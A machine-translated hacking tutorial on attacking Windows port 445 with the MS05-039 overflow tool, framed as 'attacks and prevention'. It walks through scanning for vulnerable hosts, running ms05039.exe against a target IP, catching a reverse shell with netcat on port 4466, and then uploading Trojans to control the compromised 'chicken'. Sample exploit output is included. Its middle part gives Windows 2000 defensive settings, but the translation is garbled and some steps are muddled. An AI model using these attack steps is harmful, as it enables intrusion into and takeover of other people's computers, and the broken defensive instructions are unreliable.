445端口 445 port
Teach you 445 port attacks and prevention:
The 445 port is a port to get both praise and blame it, we caneasily access a variety of LAN in a shared folder or printersharing, but it is also because of it, hackers have a chance,they can pass through the port secretly sharing your hard drive,or even fall in your hard disk will be silent! What we can dois to think of away that hackers can take advantage of, blockingthe 445 port holes. For simplicity, in this paper, we takeWindows 2000 as an example, for Windows XP, the steps arebasically similar.
In the first step, what we need to do is to identify ahost with445 port vulnerabilities. You can scan it with scanning tools!SUPERSCAN, for example, is a port scanning tool.
The second step, assuming that we now have a host with a 445port vulnerability, we can use the Swiss Army knife NC and theoverflow tool ms05039 to attack:
F:\445>ms05039 target IP local IP 1234
. . . . . .
. . . . . .
F:\445>nc. exe -vv -l -p 1234
. . . . . .
. . . . . .
If you succeed, you will return to a shell, and then you canuse our usual commands. For example, let him download our Trojanhorse or upload a Trojan horse to him, and then run, so get achicken.
Do you think your computer is dangerous?Don't be afraid. Herewe are to remove this dangerous 445 port vulnerability:Attack methods against 445 port vulnerabilities:
1. port exclusion method
This method uses the port exclusion function of Windows 2000system, all packets from the 445 port will be banned
The evil guys can't get close to your mainframe, and here' s theconcrete implementation of this approach:
Open the start menu of the Windows 2000 system, select the"network and dial up connection" icon under the "Settings" item,right-click it, and click "Browse" command from the shortcutmenu;
In the next window, right-click the "Internet connection" icon,select the "attribute" option, and then pop up the Internetconnection property window;
Open the "regular" tab page, select the "Internet Protocol"(TCP/IP) item, and then click the "property" button to open the
Internet (TCP/IP) property settings page;
Click the page in the "advanced" button, open the advancedTCP/IP settings window, select the "options" label, and labelsin the pages of the "optional settings", "TCP/IP screen" isselected, and then click the "properties" button, open the TCP/IP screening set port;
The 445 port belongs to a TCP port, you can set at thecorresponding port "TCP", will "allow only" of selectedactivation following the "add" button, click the button in thewindow open by the add filter ", the service port number willmust be used, add come in, and will be less than the 445 portnumber excluded, after setting, click"OK"button, you can maketo take effect.
2. service shutdown method
Taking into account the folder or printer sharing service willuse to port 445, so directly to the folder or printer sharingservice stop, canalso realize the closure of 445 port to allowhackers to destroy all kinds of shared resources, the followingare the specific steps to close the folder or printer sharingservice:
Open the start menu of the Windows 2000 system, select the"network and dial up connection" icon under the "Settings" item,right-click it, and click "Browse" command from the shortcutmenu;
In the next window, right-click the "Internet connection" icon,
select the "attribute" option, and then pop up the Internetconnection property window;
Open the "regular" tab page,
And in"this connectionuses the following selected components"list box, the "Microsoft network file or printer sharing"option before the cancellation number canceled, as shown infigure 2. Finally, click the "OK"button to restart the system,and the "big villains" on Internet have no access to all kindsof shared resources.
Of course, you can not stop sharing service conditions,deprivedof"sharedaccess rights are thewicked"; use the localsecurity settings in the user rights assignment function,specify anyusers on Internet have the right to access the localhost specific steps:
In the Windows 2000 start menu system, click the "program" and"management tools" and "local security settings" option, andthen expand the security settings "and" local policy "" userrights assignment "folder in the corresponding right sub windowto select"deny access to this computer from the network"option,and with the mouse left click on the;
Open the settings window, click the Add button, the pop-up"select auser or group dialog box, select the" everyone"option,and then click the Add button, finally click" OK", so that anyone user can access from the network to the local host.First look for chickens with MS05-039 vulnerabilities, and the
bugs open 445 and 139 ports,
Scan with a scanner
Next, exploit a vulnerability tool to attack a remotecalculator
Open the command prompt and enter ms05039. exe 192. 168.0.3
192. 168.0. 2 44661
Mean: 192. 168.0. 3 chicken IP address, 192. 168.0.2 is the localIP address, 4466 successful remote computing data overflowchicken will be connected to port 4466 on the local computer,1 on behalf of the remote chicken is Chinese version, Englishset 0. When successful execution of remote data overflowoperation, there will be a hint of successful overflow, suchas:
Trying to connect to remote port on 192. 168.0.3:445. . .ESTABLI SHED
Maki ng, nul l, se ssi on. . . OK
Trying, to, bind, pipe. . . OK
Trying, to, send, craf ted, packet. . . OK
Exploit done! Check your reverse shell on 192. 168.0.2:4466When the overflow is successful, immediately use NC (called theSwiss Army knife) to monitor the data that bounces back to the
4466 port of the machine.
Restart a command prompt, enter the command: NC -vv (two V) -l-p 4466 for data monitoring,
It will soon be able to monitor a remote SHELL withadministrator privileges.
So far, it has successfully entered the remote chicken system.At this time, you can upload Trojan horses through FTP, TFTP,etc.
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